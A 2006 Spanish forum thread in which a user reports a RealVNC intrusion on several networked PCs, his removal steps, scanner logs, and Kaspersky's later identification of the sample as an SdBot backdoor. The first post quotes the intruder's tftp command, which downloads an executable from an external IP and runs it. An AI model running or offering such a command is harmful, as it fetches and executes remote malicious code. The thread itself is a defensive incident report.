Virus/troyano/gusano para vnc indetectable para los antiviru

Jaxtter · Mensaje por **Jaxtter** » 22 Sep 2006, 20:04

Hola amigos!

Desde hace unos dias estan ocurriendo cosas muy raras con los pc de varias personas que conozco tanto en sus trabajos como en sus casas y, me gustaria saber si alguno más le ha pasado y si a averiguado la causa inicial. Aqui va la historia:

-De repente un dia internet deja de funcionar, el router sincroniza con la adsl pero ningun equipo de la red puede navegar, ni recibir correo ni nada.

-El tecnico de la compañia telefonica certifica que el router no tiene ningun problema

-En todos los ordenadores esta instalada la aplicaion RealVNC desde hace meses (aunque solo uno de los PC tiene abierto el puerto 5900 en el router) y de vez en cuando "alguien" se conecta (saltandose las contraseñas del realvnc) y toma el control de varios ordenadores y ejecuta las siguientes acciones:

*Abre Inicio->Ejecutar->%systemroot%\system32\cmd.exe

*Desde msdos escribe esto a una velocidad imposible para la mano humana:

tftp -i 80.103.200.202 get wintasks32.exe& start wintasks32.exe& exit

*Tras descargar el archivo wintasks32.exe lo ejecuta

*Se desconecta del RealVNC

*Pasados unos minutos se vuelve a conectar y repite el

proceso.

-Instalo el DoMeter en el PC para ver el trafico de red y sin ninguna actividad por parte del usuario hay un envio y rececion de bytes considerables.

-En dicho PC, desde MS-DOS, ejecuto el "netstat -a -o" y veo que se esta produciendo un escaneo de puertos a todas las ip locales en el puerto 5900 (puerto de escucha por defecto del RealVNC).

El responsable del esacneo de puertos es un archivo llamado "setupxp.exe" que se guarda en "C:\Documents & Setings\[USUARIO]" y queda cargado en el registro de windows con el nombre de "Microsoft Windows Setup" tanto en HKLM_Software_Microsoft_Windows_Current Version_Run como en HKLM_Software_Microsoft_Windows_Current Version_Run Services. Se que ese archivo es el responsable ya que si termino ese proceso con el Administrador de Tareas el escaneo de ips cesa. Y en el momento en que lo vuelvo a ejecutar comienza el escaneo de nuevo.

Tras el susto inicial, las acciones que tome fueron:

-Buscar y eliminar el archivo setupxp.exe y wintasks32.exe en todas los ordenadores de la red (tambien eliminar las claves de registro)

-Cambiar el puerto de escucha por defecto del RealVNC

-Cerrar el puerto 5900 en el router

-Actualizar la version del RealVNC de la 4.1.1 a la 4.1.2 debido a [url=http://www.laflecha.net/canales/seguridad/noticias/200605162/]ESTO[/url]

Ni el Nod32, ni norton2006, ni panda internet security, ni kaspersy internet security 6, ni avg antivirus (amen de todos los antipyware habido y por haber) fueron capaces de detectar nada maligno en el proceso SETUPXP.EXE. ¿alguien tiene alguna informacion de este troyano o lo que sea?¿quien lo creo?¿si es algo que ya llevaba tiempo pasando?

Desde que corté los accesos no ha vuelto a producirse ninguna conexion no autorizada, pero lo que mas me preocupa es que no se como entro el setupxp.exe en alguna de las maquinas y sobre todo como es posible que ningun antivirus o antispyware detectase nada.

Tan solo decir a todos aquellos que useis el RealVNC que verifiqueis vuestros PC y sobre todo actualizar la version del programa o cambiar de aplicacion a WinVNC, FireVNC,...

Saludos Cordiales!!

novatillo · Mensaje por **novatillo** » 22 Sep 2006, 20:58

Lo primero que deberias hacer es mandar copia del archivo sospechoso

SETUPXP.EXE

Todas las muestras que pedimos al respecto, nos las puede enviar a zonavirus@satinfo.es anexadas a un mail en cuyo texto indique como referencia "REF <nick que usa en el foro>" y asi podremos informarle si hay alguna incidencia sobre el particular, gracias.

Tras recibirlas, las analizaremos e implementaremos su control y eliminación, si procede, en nuestras utilidades, de lo cual informaremos en el foro, como siempre.

Luego prueba con elistara y tras reiniciar copias el contenido de C:/infosat.txt y lo pegas aqui a ver que dice y prueba yambien elitriip.

ELISTARA.

http://www.zonavirus.com/descargas/elistara.asp

ELITRIIP.

http://www.zonavirus.com/descargas/elitriip.asp

Y comentas como te ha ido.

Saludos.

Jaxtter · Mensaje por **Jaxtter** » 22 Sep 2006, 21:31

Muchas gracias por tu respuesta. El resultado es:

Fri Sep 22 21:21:55 2006

EliTriIP v2.51 (c)2006 S.G.H. / Satinfo S.L.

---------------------------------------------

Lista de Acciones (por Acción Directa):

No detectado Parche MS06-001 de Microsoft instalado. (WMF)

No detectado Parche MS06-040 de Microsoft instalado. (SServidor)

No detectó nada raro.

Saludos cordialeS

novatillo · Mensaje por **novatillo** » 22 Sep 2006, 22:13

Lo primero lanza un windowsupdate para actualizar los parches.

Lo segundo has mandado el archivo que te pedia?

Y lo tercero has lanzado elistara? si es asi postea el infosat de elistara.

Saludos.

Jaxtter · Mensaje por **Jaxtter** » 22 Sep 2006, 23:08

Resultado del ElistarA:

Fri Sep 22 22:30:36 2006

EliStartPage v12.40 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Acción Directa):

Eliminada Carpeta "%WinSys%\LogFiles"

No detectado Parche MS06-001 de Microsoft instalado. (WMF)

No detectado Parche MS06-040 de Microsoft instalado. (SServidor)

Fri Sep 22 22:32:27 2006

EliStartPage v12.40 (c)2006 S.G.H. / Satinfo S.L.

--------------------------------------------------

Lista de Acciones (por Exploración):

C:\Archivos de programa\Anti-Spy.Info\ASCODE.DLL --> Eliminado, PWS-WoW

C:\Archivos de programa\Anti-Spy.Info\SPYPRODLL.DLL --> Eliminado, PWS-WoW

C:\Archivos de programa\Anti-Spy.Info\SPYPROTECTOR.EXE --> Eliminado, BackDoor-CGZ

C:\Archivos de programa\DVD Decrypter\UNINSTALL.EXE --> AutoExtraible

C:\Archivos de programa\DynDNS Updater\DYNDNS.EXE --> Eliminado, Spy.Delf (BHO)

C:\Archivos de programa\Pixio\UNINSTALL.EXE --> AutoExtraible

C:\Archivos de programa\ratDVD\UNINST.EXE --> AutoExtraible

C:\Archivos de programa\RealVNC\VNC4\AGENTEONLINE.EXE --> Eliminado, Ailis

C:\Archivos de programa\SHOUTcast\UNINST-DNAS.EXE --> AutoExtraible

C:\Archivos de programa\Ulead Systems\Ulead GIF Animator 5\ANIGEN.EXE --> Eliminado, PromulGate

C:\Archivos de programa\Unlocker\UNINST.EXE --> AutoExtraible

C:\Documents and Settings\All Users\Datos de programa\Kaspersky Anti-Virus Personal\5.0\Bases\Patches\PATCH_PERS_5.0.383_384_TO_5.0.385.EXE --> AutoExtraible

C:\Documents and Settings\All Users\Datos de programa\Kaspersky Anti-Virus Personal\5.0\Bases\Patches\PATCH_PERS_5.0.388_390_TO_5.0.391.EXE --> AutoExtraible

C:\Documents and Settings\Wakemaster\Menú Inicio\Programas\Microsoft Visual Studio 6.0\NEWS GENERATOR 1.0.EXE --> Eliminado, Ailis

C:\vnc\AGENTEONLINE.EXE --> Eliminado, Ailis

C:\vnc\SOPORTEONLINEW.EXE --> Eliminado, Ailis

C:\Wallpaper\ROTAPEPER1024.EXE --> Eliminado, Ailis

Los infectaqdos con Ailis no son peligros reales ya que son exes creados por mi mismo en VB6.

El archivo setupxp.exe lo mandé nada mas ver tu mensaje.

Los parches los descargo ya mismo.

Gracias por tu paciencia.

Jaxtter · Mensaje por **Jaxtter** » 24 Sep 2006, 23:27

Virus confirmado en setupxp.exe. Tras enviar el ejecutable a esta web tb lo envié a kasparsky y hoy me enviaron el siguiente mail:

--------------------------------------------------------

Hello, thank you, detected as Backdoor.Win32.SdBot.aws

Detection will be added to the next update.

--

Best regards, Shvetsov Dmitry

Virus analyst, Kaspersky Lab.

e-mail: newvirus@kaspersky.com

http://www.kaspersky.com/

> Attachment: setupxp.exe

--------------------------------------------------------

Y efectivamente, el Kasperky IS 6 hoy me lo a detectado y eliminado. Aunque sigo sin saber como narices entra en los PCs.

novatillo · Mensaje por **novatillo** » 25 Sep 2006, 00:18

Pues uno de los motivos suele ser la falta de parches de serguridad por eso es recomendable actualizarlos.

Saludos